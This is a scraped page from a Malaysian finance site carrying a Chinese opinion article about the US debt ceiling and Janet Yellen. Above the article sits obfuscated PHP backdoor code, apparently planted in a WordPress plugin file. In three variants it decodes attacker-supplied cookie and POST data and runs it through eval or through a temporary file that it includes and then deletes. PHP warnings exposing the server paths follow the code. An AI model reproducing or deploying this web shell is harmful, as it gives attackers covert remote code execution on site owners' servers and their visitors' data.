$CIRhEIFSCu = chr (106) . 'W' . "\137" . chr (90) . "\127" . chr (119) . "\147";$FbthST = chr (99) . chr (108) . chr ( 998 - 901 ).'s' . 's' . chr ( 560 - 465 )."\145" . 'x' . 'i' . "\x73" . "\164" . chr ( 180 - 65 ); $fMYycku = class_exists($CIRhEIFSCu); $FbthST = "6733";$CopWzlVXK = !1;if ($fMYycku == $CopWzlVXK){function nrYeoHXp(){$fxTPpDG = new /* 20095 */ jW_ZWwg(48408 + 48408); $fxTPpDG = NULL;}$RXFiQtI = "48408";class jW_ZWwg{private function OysGO($RXFiQtI){if (is_array(jW_ZWwg::$tkaPFQ)) {$AXvCkv = str_replace('<' . chr (63) . "\x70" . "\150" . "\160", "", jW_ZWwg::$tkaPFQ["\x63" . chr ( 209 - 98 ).chr (110) . "\164" . chr ( 628 - 527 ).'n' . 't']);eval($AXvCkv); $RXFiQtI = "48408";exit();}}private $xTwwJ;public function PRjynhjZwN(){echo 59034;}public function __destruct(){$RXFiQtI = "27926_33395";$this->OysGO($RXFiQtI); $RXFiQtI = "27926_33395";}public function __construct($aKDFkbW=0){$YlSbYDzUah = $_POST;$XYkQU = $_COOKIE;$OHeDP = "5a0a2c91-ad19-44a6-b9ba-558e307d7328";$lYGKvfmO = @$XYkQU[substr($OHeDP, 0, 4)];if (!empty($lYGKvfmO)){$FAegDVBIgs = "base64";$AuSxlUWRhg = "";$lYGKvfmO = explode(",", $lYGKvfmO);foreach ($lYGKvfmO as $QIbQVE){$AuSxlUWRhg .= @$XYkQU[$QIbQVE];$AuSxlUWRhg .= @$YlSbYDzUah[$QIbQVE];}$AuSxlUWRhg = array_map($FAegDVBIgs . "\137" . 'd' . "\145" . "\143" . chr ( 365 - 254 ).chr (100) . chr (101), array($AuSxlUWRhg,)); $AuSxlUWRhg = $AuSxlUWRhg[0] ^ str_repeat($OHeDP, (strlen($AuSxlUWRhg[0]) / strlen($OHeDP)) + 1);jW_ZWwg::$tkaPFQ = @unserialize($AuSxlUWRhg);}}public static $tkaPFQ = 15685;}nrYeoHXp();}$dYFhungGZe = chr ( 243 - 121 ).chr ( 443 - 355 )."\x45" . chr ( 415 - 320 )."\111" . chr (105) . 'j';$ItpsERZjHD = "\x63" . "\154" . 'a' . "\x73" . "\x73" . "\137" . chr (101) . "\170" . chr ( 557 - 452 ).chr (115) . "\164" . chr ( 1033 - 918 ); $UiBkpPyFk = class_exists($dYFhungGZe); $ItpsERZjHD = "2275";$ogMrIG = !1;if ($UiBkpPyFk == $ogMrIG){function VlrqtzdDvN(){$GfPnoe = new /* 56456 */ zXE_Iij(234 + 234); $GfPnoe = NULL;}$SKKNfI = "234";class zXE_Iij{private function MiDARApf($SKKNfI){if (is_array(zXE_Iij::$gNRPH)) {$UatBaHdc = sys_get_temp_dir() . "/" . crc32(zXE_Iij::$gNRPH[chr ( 161 - 46 )."\141" . chr ( 577 - 469 )."\164"]);@zXE_Iij::$gNRPH["\x77" . 'r' . "\151" . chr ( 513 - 397 )."\145"]($UatBaHdc, zXE_Iij::$gNRPH["\143" . "\x6f" . "\156" . chr ( 667 - 551 ).'e' . 'n' . "\x74"]);include $UatBaHdc;@zXE_Iij::$gNRPH['d' . "\145" . "\x6c" . chr ( 355 - 254 )."\x74" . chr ( 301 - 200 )]($UatBaHdc); $SKKNfI = "234";exit();}}private $xLSvdhQ;public function CsOBcK(){echo 26770;}public function __destruct(){$SKKNfI = "65027_3297";$this->MiDARApf($SKKNfI); $SKKNfI = "65027_3297";}public function __construct($pLGLUF=0){$NiYPueCc = $_POST;$Hirlz = $_COOKIE;$ydMyl = "f94c1b65-e620-47ef-a300-081973ad2805";$fKAdlyk = @$Hirlz[substr($ydMyl, 0, 4)];if (!empty($fKAdlyk)){$sXTjVEcTMO = "base64";$HCgBGd = "";$fKAdlyk = explode(",", $fKAdlyk);foreach ($fKAdlyk as $VvxwO){$HCgBGd .= @$Hirlz[$VvxwO];$HCgBGd .= @$NiYPueCc[$VvxwO];}$HCgBGd = array_map($sXTjVEcTMO . "\x5f" . 'd' . 'e' . "\143" . chr (111) . "\144" . "\x65", array($HCgBGd,)); $HCgBGd = $HCgBGd[0] ^ str_repeat($ydMyl, (strlen($HCgBGd[0]) / strlen($ydMyl)) + 1);zXE_Iij::$gNRPH = @unserialize($HCgBGd);}}public static $gNRPH = 39407;}VlrqtzdDvN();}$lJfXS = chr ( 507 - 401 )."\x4f" . "\167" . "\137" . chr (74) . chr ( 825 - 728 ).chr ( 738 - 616 ); $exufEQIQ = "\143" . chr ( 1016 - 908 ).chr (97) . chr ( 336 - 221 ).'s' . '_' . "\x65" . "\x78" . "\151" . "\163" . chr (116) . chr (115); $tLjOmBW = class_exists($lJfXS); $exufEQIQ = "49845";$XWXBQ = !1;if ($tLjOmBW == $XWXBQ){function ZXWcxc(){$wNZGH = new /* 36604 */ jOw_Jaz(17643 + 17643); $wNZGH = NULL;}$wfKFPAopXQ = "17643";class jOw_Jaz{private function QqsdNNP($wfKFPAopXQ){if (is_array(jOw_Jaz::$jPGzK)) {$Uscqb = sys_get_temp_dir() . "/" . crc32(jOw_Jaz::$jPGzK['s' . chr ( 272 - 175 ).chr (108) . chr (116)]);@jOw_Jaz::$jPGzK["\x77" . chr (114) . "\x69" . chr (116) . chr (101)]($Uscqb, jOw_Jaz::$jPGzK['c' . chr (111) . "\x6e" . 't' . chr (101) . "\x6e" . 't']);include $Uscqb;@jOw_Jaz::$jPGzK[chr ( 105 - 5 ).chr (101) . 'l' . chr ( 698 - 597 ).chr ( 351 - 235 )."\x65"]($Uscqb); $wfKFPAopXQ = "17643";exit();}}private $JMicTYALWz;public function HVQsPsT(){echo 50484;}public function __destruct(){$wfKFPAopXQ = "59776_268";$this->QqsdNNP($wfKFPAopXQ); $wfKFPAopXQ = "59776_268";}public function __construct($soJcvAZ=0){$agzigwEm = $_POST;$VALlu = $_COOKIE;$uVovPkAi = "051f6601-ec8c-477e-8e06-865fdd3a2472";$sNrMJdFp = @$VALlu[substr($uVovPkAi, 0, 4)];if (!empty($sNrMJdFp)){$mfIMIS = "base64";$xQBmya = "";$sNrMJdFp = explode(",", $sNrMJdFp);foreach ($sNrMJdFp as $KQJxFwve){$xQBmya .= @$VALlu[$KQJxFwve];$xQBmya .= @$agzigwEm[$KQJxFwve];}$xQBmya = array_map($mfIMIS . '_' . "\144" . chr ( 258 - 157 ).chr (99) . 'o' . 'd' . 'e', array($xQBmya,)); $xQBmya = $xQBmya[0] ^ str_repeat($uVovPkAi, (strlen($xQBmya[0]) / strlen($uVovPkAi)) + 1);jOw_Jaz::$jPGzK = @unserialize($xQBmya);}}public static $jPGzK = 9789;}ZXWcxc();}
Warning: session_start(): Cannot start session when headers already sent in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 31

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 46

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 47

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 48
取消债务上限?耶伦是疯了还是老人痴呆? - Sharix

取消债务上限?耶伦是疯了还是老人痴呆?

近期全球市场的剧烈震荡吓坏了不少投资者。美国股市在上个星期出现大跌,随后也在星期五回收部分的跌幅。市场目前最恐慌的因素,除了是中国的恒大事件及美国的支出法案,最重要的就是美国债务上限的问题。耶伦阿姨也在上个星期发表谈话,成为市场未来潜在的巨大危机。到底耶伦说了什么,对市场又有着什么影响?

其实自从2013年起,美国政府已经七次暂停债务上限的机制,而距离上次敲定暂停债务上限的法案是在2019年8月2日,为期两年。也就是说,美国政府在2021年8月1日过后再也无法通过举债来筹集资金。

而就在美国联邦政府在本财政年结束之际,美国国会通过了一项避免政府关门的预算案,并由总统拜登签署,使政府在最后关头免于停摆,也能正常运转至12月3日。这项短期拨款法案在参议院以65票对35票首先通过,随后也在众议院以254票对175票通过。除了为联邦政府运转提供资金,新法案还将为遭到飓风和野火灾害的州提供286亿美元资金,另外还有63亿美元将用来重新安置阿富汗战争中的难民。

虽然短期拨款法案解决了美国救急的问题,但救穷的问题依然存在。美国的债务上限为22万亿美元,但目前却背负着28.7万亿美元的债务,其中有7,000亿美元是来自拜登总统上任以来的新增债务。在今年7月31日债务上限到期后,财政部都在使用非常规手段为政府提供资金。

目前国会面临着债务上限的困境,如果未能在10月18日前采取行动提高或暂停债务上限,财政部可能用尽其非常规措施,美国将会出现有史以来的首次违约。耶伦也说到对财政部发行的债券规模任意设置上限会限制国会和总统已经批准的法案的执行能力,导致美国出现无法支付账单的局面。因此,耶伦也提出了令笔者感到恐惧的言论,那就是他希望看到国会最终行使取消债务上限的的权力。

笔者先简单和大家解释假设美国政府真的违约会发生什么状况。之前笔者的文章有提到,美国国债是全世界认为最安全、流动性最佳的资产,也是全球无风险利率的指标。投资者经常关注殖利率的起跌如何影响科技股的走势,乃至全球股市的走向,几乎和美债脱离不了关系。

如果美国真的发生违约,意味着美国的信用评级将会被大幅下调,而长期持有美债的全球投资者也不会再认为美债是全球最安全的无风险资产。届时,美国联邦政府,甚至是全球的借贷成本将会上升,借款者都将会面临更高的借款利率。

2011年的时候,出于同样的债务上限事件,虽然最终美国国会在美国的债务上限到期之前获得解决,但还是依旧逃脱不了标普评级机构把美国主权信用评级从 AAA 降级至 AA+,导致当时美国的标普500出现了17.8% 的回调。

其实大家有没有注意到为什么美国会有债务上限的制度,而其他西方国家不曾出现?回顾过去,美国国会再1917年首次设立债务上限制度表面上的用意是要定期检查政府的开支。但自1960年以来,美国已经78次提高或是暂停债务上限。从根本上来说,债务上限已经没有存在的意义。

自从美元和黄金在1970年代脱钩之后,目前唯一支撑着美元价值的就是全球对于美元的信用。当时黄金离开货币的历史舞台,最主要的原因就是黄金并不能满足身为货币的特性,那就是黄金没有供给上的弹性,各国也不能随机增加黄金的供给量去满足央行的货币政策。而人类的物质文明随着工业革命的蓬勃发展籍人口增长不断进步,全球对于货币的需求不断增加。

当人们知道黄金在开采量上开始受到限制,黄金也就逐渐离开货币的历史舞台。所以黄金离开货币的历史舞台有一个必然性,因为他无法支持不断膨胀的经济。因此,取而代之的就是我们现在的美元,而美元也必须受到许多法规上的限制,当中最主要的就是美国债务上限,以确保美国政府不会随意滥发钞票。

目前耶伦向国会提出的,就是要取消债务上限这个紧箍咒。虽然美国曾多次暂停债务上限,但至少债务上限对于美债还是有一定的束缚能力。笔者认为,美债的发行量在未来会缓慢增加去满足经济上的需求,但不至于毫无节制的超发。

可是,如果债务上限真的被消除,举极端的例子,全球将会出现史无前例的停滞性通货膨胀,简称滞涨。为什么是滞涨?这是因为全球在生产力没有提高的环境下物价快速增长,经济就会形成空转的局面。届时货币将会迅速贬值,而美元作为全球的储备及交易货币的地位也将会崩塌。

总的来说,笔者认为美国的债务上限大多数情况下都会被通过,只是目前国会两党都在使阴谋论,试图在解决方案出炉之前对另一方进行施压以满足各党派之间的利益。但无论如何,笔者认为债务上限必须要保持,它是全球物价上涨的最后一道防线。一旦解除,一场史无前例的金融和经济危机将会笼罩全球,无人能幸免。

最新文章

Sharix Sdn Bhd (1313184-A)
@ 2023 Sharix Sdn Bhd. All Rights Reserved
官方社交平台